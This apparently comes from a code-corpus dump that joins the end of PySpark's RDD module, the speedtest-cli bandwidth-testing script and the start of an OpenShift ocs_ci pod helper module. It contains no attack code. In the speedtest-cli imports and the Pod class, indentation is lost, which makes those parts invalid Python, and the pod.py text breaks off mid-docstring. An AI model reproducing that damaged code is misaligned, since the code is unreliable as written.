    jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
    jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
    r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
    return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
    """
    .. note:: Experimental

    Approximate operation to return the mean within a timeout
    or meet the confidence.

    >>> rdd = sc.parallelize(range(1000), 10)
    >>> r = sum(range(1000)) / 1000.0
    >>> abs(rdd.meanApprox(1000) - r) / r < 0.05
    True
    """
    # coerce every element to float, then delegate to JavaDoubleRDD
    jrdd = self.map(float)._to_java_object_rdd()
    jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
    r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
    return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
    """
    .. note:: Experimental

    Return approximate number of distinct elements in the RDD.

    The algorithm used is based on streamlib's implementation of
    `"HyperLogLog in Practice: Algorithmic Engineering of a State
    of The Art Cardinality Estimation Algorithm", available here
    <http://dx.doi.org/10.1145/2452376.2452456>`_.

    :param relativeSD: Relative accuracy. Smaller values create
                       counters that require more space.
                       It must be greater than 0.000017.

    >>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
    >>> 900 < n < 1100
    True
    >>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
    >>> 16 < n < 24
    True
    """
    if relativeSD < 0.000017:
        raise ValueError("relativeSD should be greater than 0.000017")
    # the hash space in Java is 2^32, so fold Python hashes into 32 bits
    masked = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
    return masked._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
    """
    Return an iterator that contains all of the elements in this RDD.
    The iterator will consume as much memory as the largest partition in this RDD.

    >>> rdd = sc.parallelize(range(10))
    >>> [x for x in rdd.toLocalIterator()]
    [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
    """
    # stream partitions one at a time from the JVM over a local socket
    with SCCallSiteSync(self.context) as css:
        sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
    return _load_from_socket(sock_info, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
    """Serialize a command (function tuple) for shipping to Python workers.

    Large commands (> 1 MiB) are sent via a broadcast variable instead of
    inline, to keep task sizes small.
    """
    # the serialized command will be compressed by broadcast
    ser = CloudPickleSerializer()
    pickled_command = ser.dumps(command)
    if len(pickled_command) > (1 << 20):  # 1M
        # The broadcast will have same life cycle as created PythonRDD
        broadcast = sc.broadcast(pickled_command)
        pickled_command = ser.dumps(broadcast)
    # snapshot and clear broadcast vars referenced by pickled closures
    broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
    sc._pickled_broadcast_vars.clear()
    return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
    """Wrap a Python function into a JVM-side PythonFunction object."""
    assert deserializer, "deserializer should not be empty"
    assert serializer, "serializer should not be empty"
    # bundle the function with its (de)serializers and optional profiler,
    # then ship the pickled bundle to the JVM
    command = (func, profiler, deserializer, serializer)
    pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
    return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
                                  sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
    """
    Pipelined maps:

    >>> rdd = sc.parallelize([1, 2, 3, 4])
    >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]
    >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]

    Pipelined reduces:
    >>> from operator import add
    >>> rdd.map(lambda x: 2 * x).reduce(add)
    20
    >>> rdd.flatMap(lambda x: [x, x]).reduce(add)
    20
    """

    def __init__(self, prev, func, preservesPartitioning=False):
        if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
            # This transformation is the first in its stage:
            self.func = func
            self.preservesPartitioning = preservesPartitioning
            self._prev_jrdd = prev._jrdd
            self._prev_jrdd_deserializer = prev._jrdd_deserializer
        else:
            # fuse this transformation with the previous one so both run
            # in a single Python worker pass
            prev_func = prev.func

            def pipeline_func(split, iterator):
                return func(split, prev_func(split, iterator))

            self.func = pipeline_func
            self.preservesPartitioning = \
                prev.preservesPartitioning and preservesPartitioning
            self._prev_jrdd = prev._prev_jrdd  # maintain the pipeline
            self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
        self.is_cached = False
        self.is_checkpointed = False
        self.ctx = prev.ctx
        self.prev = prev
        self._jrdd_val = None  # lazily built by the _jrdd property
        self._id = None
        self._jrdd_deserializer = self.ctx.serializer
        self._bypass_serializer = False
        self.partitioner = prev.partitioner if self.preservesPartitioning else None

    def getNumPartitions(self):
        return self._prev_jrdd.partitions().size()

    @property
    def _jrdd(self):
        # Build (and cache) the JVM-side PythonRDD on first access.
        if self._jrdd_val:
            return self._jrdd_val
        if self._bypass_serializer:
            self._jrdd_deserializer = NoOpSerializer()
        if self.ctx.profiler_collector:
            profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
        else:
            profiler = None
        wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
                                      self._jrdd_deserializer, profiler)
        python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
                                             self.preservesPartitioning)
        self._jrdd_val = python_rdd.asJavaRDD()

        if profiler:
            self._id = self._jrdd_val.id()
            self.ctx.profiler_collector.add_profiler(self._id, profiler)
        return self._jrdd_val

    def id(self):
        if self._id is None:
            self._id = self._jrdd.id()
        return self._id

    def _is_pipelinable(self):
        # caching/checkpointing forces materialization, which breaks fusion
        return not (self.is_cached or self.is_checkpointed)
def _test():
    """Run this module's doctests against a local 4-core SparkContext."""
    import doctest
    from pyspark.context import SparkContext
    globs = globals().copy()
    # The small batch size here ensures that we see multiple batches,
    # even in these small test examples:
    globs['sc'] = SparkContext('local[4]', 'PythonTest')
    (failure_count, test_count) = doctest.testmod(
        globs=globs, optionflags=doctest.ELLIPSIS)
    globs['sc'].stop()
    if failure_count:
        sys.exit(-1)


if __name__ == "__main__":
    _test()
|
speedtest-cli.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2013 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.2.1'
try:
from urllib2 import urlopen, Request
except ImportError:
from urllib.request import urlopen, Request
import math
import time
import os
import sys
import threading
import re
import signal
from xml.dom import minidom as DOM
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
    import builtins
except ImportError:
    # Python 2: no `builtins` module, so define a print function ourselves.
    # NOTE: `basestring` and `unicode` below only exist on Python 2, which is
    # exactly the interpreter this fallback branch runs on.
    def print_(*args, **kwargs):
        """The new-style print function taken from
        https://pypi.python.org/pypi/six/
        """
        fp = kwargs.pop("file", sys.stdout)
        if fp is None:
            return

        def write(data):
            if not isinstance(data, basestring):
                data = str(data)
            fp.write(data)

        # decide whether output must be written as unicode text
        want_unicode = False
        sep = kwargs.pop("sep", None)
        if sep is not None:
            if isinstance(sep, unicode):
                want_unicode = True
            elif not isinstance(sep, str):
                raise TypeError("sep must be None or a string")
        end = kwargs.pop("end", None)
        if end is not None:
            if isinstance(end, unicode):
                want_unicode = True
            elif not isinstance(end, str):
                raise TypeError("end must be None or a string")
        if kwargs:
            raise TypeError("invalid keyword arguments to print()")
        if not want_unicode:
            for arg in args:
                if isinstance(arg, unicode):
                    want_unicode = True
                    break
        if want_unicode:
            newline = unicode("\n")
            space = unicode(" ")
        else:
            newline = "\n"
            space = " "
        if sep is None:
            sep = space
        if end is None:
            end = newline
        for i, arg in enumerate(args):
            if i:
                write(sep)
            write(arg)
        write(end)
else:
    # Python 3: reuse the real built-in print and drop the module reference
    print_ = getattr(builtins, 'print')
    del builtins
def distance(origin, destination):
    """Determine distance between 2 sets of [lat,lon] in km.

    Uses the haversine formula on a spherical Earth of radius 6371 km.
    """
    lat1, lon1 = origin
    lat2, lon2 = destination
    earth_radius_km = 6371

    half_dlat = math.radians(lat2 - lat1) / 2
    half_dlon = math.radians(lon2 - lon1) / 2
    # haversine term: sin^2(dlat/2) + cos(lat1)*cos(lat2)*sin^2(dlon/2)
    a = (math.sin(half_dlat) * math.sin(half_dlat)
         + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2))
         * math.sin(half_dlon) * math.sin(half_dlon))
    central_angle = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    return earth_radius_km * central_angle
class FileGetter(threading.Thread):
    """Download worker thread: fetches one URL and records chunk sizes read."""

    def __init__(self, url, start):
        self.url = url
        # becomes a list of per-chunk byte counts once run() starts
        self.result = None
        self.starttime = start
        threading.Thread.__init__(self)

    def run(self):
        # seed with 0 so sum(self.result) is valid even if nothing is read
        self.result = [0]
        try:
            # do not start new downloads more than 10s into the test
            if (time.time() - self.starttime) <= 10:
                f = urlopen(self.url)
                # read 10 KiB chunks until EOF or global shutdown is requested
                # NOTE(review): depends on the module-global `shutdown_event`
                # created by speedtest() before threads are started
                while 1 and not shutdown_event.is_set():
                    self.result.append(len(f.read(10240)))
                    if self.result[-1] == 0:
                        break
                f.close()
        except IOError:
            # best-effort: a failed download simply contributes its partial count
            pass
def downloadSpeed(files, quiet=False):
    """Download `files` concurrently and return mean throughput in bytes/s.

    Uses a bounded producer/consumer pair: the producer starts one
    FileGetter thread per URL (at most 6 in flight via the queue), the
    consumer joins them and accumulates the byte totals.
    """
    start = time.time()

    def producer(q, files):
        for file in files:
            thread = FileGetter(file, start)
            thread.start()
            q.put(thread, True)  # blocks when 6 downloads are in flight
            if not quiet and not shutdown_event.is_set():
                sys.stdout.write('.')  # progress dot per started download
                sys.stdout.flush()

    finished = []

    def consumer(q, total_files):
        while len(finished) < total_files:
            thread = q.get(True)
            while thread.is_alive():
                thread.join(timeout=0.1)
            finished.append(sum(thread.result))
            del thread

    q = Queue(6)
    prod_thread = threading.Thread(target=producer, args=(q, files))
    cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
    # restart the clock just before the threads begin
    start = time.time()
    prod_thread.start()
    cons_thread.start()
    while prod_thread.is_alive():
        prod_thread.join(timeout=0.1)
    while cons_thread.is_alive():
        cons_thread.join(timeout=0.1)
    return (sum(finished) / (time.time() - start))
class FilePutter(threading.Thread):
    """Upload worker thread: POSTs `size` bytes of filler data to a URL."""

    def __init__(self, url, start, size):
        self.url = url
        chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        # build a payload of exactly `size` bytes including the
        # 'content1=' prefix (hence the -9)
        data = chars * (int(round(int(size) / 36.0)))
        self.data = ('content1=%s' % data[0:int(size)-9]).encode()
        del data
        self.result = None  # bytes uploaded, set by run()
        self.starttime = start
        threading.Thread.__init__(self)

    def run(self):
        try:
            # skip uploads started more than 10s into the test or after shutdown
            if ((time.time() - self.starttime) <= 10 and
                    not shutdown_event.is_set()):
                f = urlopen(self.url, self.data)
                f.read(11)
                f.close()
                self.result = len(self.data)
            else:
                self.result = 0
        except IOError:
            self.result = 0  # failed upload contributes nothing
def uploadSpeed(url, sizes, quiet=False):
    """Upload payloads of the given `sizes` to `url`; return bytes/s.

    Mirrors downloadSpeed(): a producer starts one FilePutter per size
    (bounded to 6 in flight), a consumer joins threads and sums results.
    """
    start = time.time()

    def producer(q, sizes):
        for size in sizes:
            thread = FilePutter(url, start, size)
            thread.start()
            q.put(thread, True)  # blocks when 6 uploads are in flight
            if not quiet and not shutdown_event.is_set():
                sys.stdout.write('.')
                sys.stdout.flush()

    finished = []

    def consumer(q, total_sizes):
        while len(finished) < total_sizes:
            thread = q.get(True)
            while thread.is_alive():
                thread.join(timeout=0.1)
            finished.append(thread.result)
            del thread

    q = Queue(6)
    prod_thread = threading.Thread(target=producer, args=(q, sizes))
    cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
    # restart the clock just before the threads begin
    start = time.time()
    prod_thread.start()
    cons_thread.start()
    while prod_thread.is_alive():
        prod_thread.join(timeout=0.1)
    while cons_thread.is_alive():
        cons_thread.join(timeout=0.1)
    return (sum(finished) / (time.time() - start))
def getAttributesByTagName(dom, tagName):
    """Return the attributes of the first `tagName` element as a dict."""
    first = dom.getElementsByTagName(tagName)[0]
    return {attr_name: attr_value
            for attr_name, attr_value in first.attributes.items()}
def getConfig():
    """Download the speedtest.net configuration and return only the data
    we are interested in

    Returns None when the HTTP status is not 200.
    """
    uh = urlopen('http://www.speedtest.net/speedtest-config.php')
    configxml = uh.read()
    if int(uh.code) != 200:
        # NOTE(review): on this early-return path the handle is never closed
        return None
    uh.close()
    root = DOM.parseString(configxml)
    # keep only the four sections used by the rest of the script
    config = {
        'client': getAttributesByTagName(root, 'client'),
        'times': getAttributesByTagName(root, 'times'),
        'download': getAttributesByTagName(root, 'download'),
        'upload': getAttributesByTagName(root, 'upload')}
    del root
    return config
def closestServers(client, all=False):
    """Determine the 5 closest speedtest.net servers based on geographic
    distance

    With all=True, every known server is returned (still distance-sorted).
    Returns None when the server list cannot be fetched (non-200 status).
    """
    uh = urlopen('http://www.speedtest.net/speedtest-servers.php')
    serversxml = uh.read()
    if int(uh.code) != 200:
        return None
    uh.close()
    root = DOM.parseString(serversxml)
    # bucket server attribute dicts by their distance to the client
    servers = {}
    for server in root.getElementsByTagName('server'):
        attrib = dict(list(server.attributes.items()))
        d = distance([float(client['lat']), float(client['lon'])],
                     [float(attrib.get('lat')), float(attrib.get('lon'))])
        attrib['d'] = d
        servers.setdefault(d, []).append(attrib)
    del root

    # walk buckets in increasing distance; stop after 5 unless all requested
    closest = []
    done = False
    for d in sorted(servers.keys()):
        for s in servers[d]:
            closest.append(s)
            if len(closest) == 5 and not all:
                done = True
                break
        if done:
            break
    del servers
    return closest
def getBestServer(servers):
    """Perform a speedtest.net "ping" to determine which speedtest.net
    server has the lowest latency

    Each candidate is probed 3 times; the average round trip (in
    microseconds) picks the winner, which gets a 'latency' key added.
    """
    results = {}
    for server in servers:
        cum = []
        url = os.path.dirname(server['url'])
        for i in range(0, 3):
            uh = urlopen('%s/latency.txt' % url)
            # NOTE(review): the timer starts after urlopen() returns, so the
            # measured interval covers only the read, not connection setup —
            # confirm this is intended
            start = time.time()
            text = uh.read(9)
            total = time.time() - start
            if int(uh.code) == 200 and text == 'test=test'.encode():
                cum.append(total)
            else:
                cum.append(3600)  # penalize failures with a huge latency
            uh.close()
        avg = round((sum(cum) / 3) * 1000000, 3)
        # keyed by average latency; equal averages overwrite earlier servers
        results[avg] = server
    fastest = sorted(results.keys())[0]
    best = results[fastest]
    best['latency'] = fastest
    return best
def ctrl_c(signum, frame):
    """SIGINT handler: signal all worker threads to stop, then exit."""
    global shutdown_event
    shutdown_event.set()
    raise SystemExit('\nCancelling...')
def version():
    """Print the script version and exit."""
    raise SystemExit(__version__)
def speedtest():
    """Run the full speedtest.net test"""
    global shutdown_event
    shutdown_event = threading.Event()

    signal.signal(signal.SIGINT, ctrl_c)

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # ArgParser may be optparse.OptionParser (py<2.7 fallback); alias its
    # add_option so the add_argument calls below work on both
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--share', action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                             'share results image')
    parser.add_argument('--simple', action='store_true',
                        help='Suppress verbose output, only show basic '
                             'information')
    parser.add_argument('--list', action='store_true',
                        help='Display a list of speedtest.net servers '
                             'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--version', action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    # optparse returns an (options, args) tuple; argparse returns a namespace
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options

    if args.version:
        version()

    if not args.simple:
        print_('Retrieving speedtest.net configuration...')
    config = getConfig()

    if not args.simple:
        print_('Retrieving speedtest.net server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            # a broken pipe (e.g. piping into head) raises IOError; ignore it
            try:
                print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            except IOError:
                pass
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

    if not args.simple:
        print_('Testing from %(isp)s (%(ip)s)...' % config['client'])

    # Resolve the server to test against: explicit --server id, a
    # Speedtest Mini instance, or the lowest-latency nearby server.
    if args.server:
        try:
            best = getBestServer(filter(lambda x: x['id'] == args.server,
                                        servers))
        except IndexError:
            print_('Invalid server ID')
            sys.exit(1)
    elif args.mini:
        name, ext = os.path.splitext(args.mini)
        if ext:
            url = os.path.dirname(args.mini)
        else:
            url = args.mini
        urlparts = urlparse(url)
        try:
            f = urlopen(args.mini)
        except:
            print_('Invalid Speedtest Mini URL')
            sys.exit(1)
        else:
            text = f.read()
            f.close()
        # the Mini page embeds the upload script's file extension
        extension = re.findall('upload_extension: "([^"]+)"', text.decode())
        if not urlparts or not extension:
            print_('Please provide the full URL of your Speedtest Mini server')
            sys.exit(1)
        servers = [{
            'sponsor': 'Speedtest Mini',
            'name': urlparts[1],
            'd': 0,
            'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
            'latency': 0,
            'id': 0
        }]
        try:
            best = getBestServer(servers)
        except:
            best = servers[0]
    else:
        if not args.simple:
            print_('Selecting best server based on ping...')
        best = getBestServer(servers)

    if not args.simple:
        print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
               '%(latency)s ms' % best)
    else:
        print_('Ping: %(latency)s ms' % best)

    # 4 download URLs per image size hosted next to the server's upload URL
    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('Download: %0.2f Mbit/s' % ((dlspeed / 1000 / 1000) * 8))

    # 25 uploads each of 0.25 MB and 0.5 MB payloads
    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('Upload: %0.2f Mbit/s' % ((ulspeed / 1000 / 1000) * 8))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        # submit results to the speedtest.net API to get a share image URL
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk,
            'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
            # hash order and salt are fixed by the speedtest.net API
            'hash=%s' % md5(('%s-%s-%s-%s' %
                             (ping, ulspeedk, dlspeedk, '297aae72'))
                            .encode()).hexdigest()]

        req = Request('http://www.speedtest.net/api/api.php',
                      data='&'.join(apiData).encode())
        req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
        f = urlopen(req)
        response = f.read()
        code = f.code
        f.close()

        if int(code) != 200:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        qsargs = parse_qs(response.decode())
        resultid = qsargs.get('resultid')
        if not resultid or len(resultid) != 1:
            print_('Could not submit results to speedtest.net')
            sys.exit(1)

        print_('Share results: http://www.speedtest.net/result/%s.png' %
               resultid[0])
def main():
    """Script entry point: run the test, translating Ctrl-C into a message."""
    try:
        speedtest()
    except KeyboardInterrupt:
        print_('\nCancelling...')


if __name__ == '__main__':
    main()

# vim:ts=4:sw=4:expandtab
|
pod.py | """
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from ocs_ci.helpers import helpers
from ocs_ci.helpers.proxy import update_container_with_proxy_env
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed,
NonUpgradedImagesFoundError,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableResourceException,
)
from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern
from ocs_ci.ocs.resources.ocs import OCS, get_job_obj
from ocs_ci.utility import templating
from ocs_ci.utility.utils import (
run_cmd,
check_timeout_reached,
TimeoutSampler,
get_ocp_version,
)
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)

# Maximum seconds to wait for FIO results (Pod.get_fio_results default)
FIO_TIMEOUT = 600

# Filler text written to pods during data-integrity style tests
TEXT_CONTENT = (
    "Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
    "sed do eiusmod tempor incididunt ut labore et dolore magna "
    "aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
    "ullamco laboris nisi ut aliquip ex ea commodo consequat. "
    "Duis aute irure dolor in reprehenderit in voluptate velit "
    "esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
    "occaecat cupidatat non proident, sunt in culpa qui officia "
    "deserunt mollit anim id est laborum."
)
# Default in-pod paths used for test files
TEST_FILE = "/var/lib/www/html/test"
FEDORA_TEST_FILE = "/mnt/test"
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
    """
    Initializer function

    kwargs:
        Copy of ocs/defaults.py::<some pod> dictionary
    """
    self.pod_data = kwargs
    # configure http[s]_proxy env variable, if applicable
    update_container_with_proxy_env(self.pod_data)
    super(Pod, self).__init__(**kwargs)

    # delete=False keeps the temp file on disk; only its path is stored here
    with tempfile.NamedTemporaryFile(
        mode="w+", prefix="POD_", delete=False
    ) as temp_info:
        self.temp_yaml = temp_info.name
    self._name = self.pod_data.get("metadata").get("name")
    self._labels = self.get_labels()
    self._roles = []
    # OCP client scoped to pods in this pod's namespace
    # NOTE(review): self.namespace is presumably provided by the OCS parent
    # class — confirm
    self.ocp = OCP(
        api_version=defaults.API_VERSION,
        kind=constants.POD,
        namespace=self.namespace,
    )
    self.fio_thread = None
    # TODO: get backend config !!
    self.wl_obj = None
    self.wl_setup_done = False
@property
def name(self):
    # Pod name, read once from metadata at construction time
    return self._name

@property
def namespace(self):
    # NOTE(review): _namespace is not assigned in the visible __init__ —
    # presumably set by the OCS parent class; confirm
    return self._namespace

@property
def roles(self):
    # roles assigned via add_role()
    return self._roles

@property
def labels(self):
    # openshift labels, read once from metadata at construction time
    return self._labels

@property
def restart_count(self):
    # restart count of the FIRST container only, from live pod status
    return self.get().get("status").get("containerStatuses")[0].get("restartCount")
def __setattr__(self, key, val):
    # Write straight into the instance dict. This bypasses property setters,
    # allowing read-only properties above to coexist with direct assignment.
    self.__dict__[key] = val
def add_role(self, role):
    """
    Adds a new role for this pod

    Args:
        role (str): New role to be assigned for this pod
    """
    self._roles.append(role)
def get_fio_results(self, timeout=FIO_TIMEOUT):
    """
    Get FIO execution results

    Args:
        timeout (int): Seconds to wait for the FIO thread result

    Returns:
        dict: Dictionary represents the FIO execution results

    Raises:
        Exception: In case of exception from FIO
    """
    logger.info(f"Waiting for FIO results from pod {self.name}")
    try:
        # fio_thread is set by run_io(); block until it produces output
        result = self.fio_thread.result(timeout)
        if result:
            return yaml.safe_load(result)
        raise CommandFailed(f"FIO execution results: {result}.")

    except CommandFailed as ex:
        logger.exception(f"FIO failed: {ex}")
        raise
    except Exception as ex:
        logger.exception(f"Found Exception: {ex}")
        raise
def exec_cmd_on_pod(
    self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
    """
    Execute a command on a pod (e.g. oc rsh)

    Args:
        command (str): The command to execute on the given pod
        out_yaml_format (bool): whether to return yaml loaded python
            object OR to return raw output
        secrets (list): A list of secrets to be masked with asterisks
            This kwarg is popped in order to not interfere with
            subprocess.run(``**kwargs``)
        timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds

    Returns:
        Munch Obj: This object represents a returned yaml file
    """
    # run the command through `oc rsh <pod-name> <command>`
    rsh_cmd = f"rsh {self.name} "
    rsh_cmd += command
    return self.ocp.exec_oc_cmd(
        rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
    )
def exec_s3_cmd_on_pod(self, command, mcg_obj=None):
    """
    Execute an S3 command on a pod

    Args:
        mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials
        command (str): The command to execute on the given pod

    Returns:
        Munch Obj: This object represents a returned yaml file
    """
    # mask the S3 credentials in logged output when an MCG object is given
    return self.exec_cmd_on_pod(
        craft_s3_command(command, mcg_obj),
        out_yaml_format=False,
        secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint]
        if mcg_obj
        else None,
    )
def exec_sh_cmd_on_pod(self, command, sh="bash"):
    """
    Run *command* through a shell on this pod via ``oc exec``, so shell
    syntax such as &&, ||, ;, and for loops works.

    Args:
        command (str): The shell command to execute on the given pod
        sh (str): Shell binary to invoke (default: bash)

    Returns:
        str: stdout of the command
    """
    oc_cmd = 'exec {pod} -- {shell} -c "{cmd}"'.format(
        pod=self.name, shell=sh, cmd=command
    )
    return self.ocp.exec_oc_cmd(oc_cmd, out_yaml_format=False)
def get_labels(self):
    """
    Get labels from pod

    Returns:
        dict: All the openshift labels on a given pod (or None when the
            metadata carries no labels key)
    """
    # NOTE(review): previous docstring claimed a NotFoundError is raised,
    # but this lookup cannot raise — .get() returns None for a missing key
    return self.pod_data.get("metadata").get("labels")
def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"):
    """
    Execute a Ceph command on the Ceph tools pod

    Args:
        ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
        format (str): The returning output format of the Ceph command.
            A falsy value (e.g. None or "") omits the --format flag.

    Returns:
        dict: Ceph command output

    Raises:
        CommandFailed: In case the pod is not a toolbox pod
    """
    # guard: ceph commands are only valid on the rook-ceph-tools pod
    if "rook-ceph-tools" not in self.labels.values():
        raise CommandFailed("Ceph commands can be executed only on toolbox pod")
    # (removed a dead no-op `ceph_cmd = ceph_cmd` self-assignment)
    if format:
        ceph_cmd += f" --format {format}"
    out = self.exec_cmd_on_pod(ceph_cmd)
    # For some commands, like "ceph fs ls", the returned output is a list;
    # filter out empty entries before handing it back
    if isinstance(out, list):
        return [item for item in out if item]
    return out
def get_storage_path(self, storage_type="fs"):
    """
    Get the pod volume mount path or device path

    Args:
        storage_type (str): "fs" for a filesystem mount, "block" for a raw
            block device

    Returns:
        str: The mount path of the volume on the pod (e.g. /var/lib/www/html/)
            if storage_type is fs, else device path of raw block pv
    """
    # TODO: Allow returning a path of a specified volume of a specified
    # container
    first_container = self.pod_data.get("spec").get("containers")[0]
    if storage_type == "block":
        return first_container.get("volumeDevices")[0].get("devicePath")
    return first_container.get("volumeMounts")[0].get("mountPath")
def workload_setup(self, storage_type, jobs=1):
    """
    Do setup on pod for running FIO

    Args:
        storage_type (str): 'fs' or 'block'
        jobs (int): Number of jobs to execute FIO
    """
    work_load = "fio"
    name = f"test_workload_{work_load}"
    path = self.get_storage_path(storage_type)
    # few io parameters for Fio
    self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs)
    # NOTE(review): setup runs inside an assert, which would be stripped
    # under `python -O` — confirm this is acceptable for this test framework
    assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
    self.wl_setup_done = True
def run_io(
self,
storage_type,
size,
io_direction="rw",
rw_ratio=75,
jobs=1,
runtime=60,
depth=4,
rate="1m",
rate_process="poisson",
fio_filename=None,
bs="4K",
end_fsync=0,
):
"""
Execute FIO on a pod
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
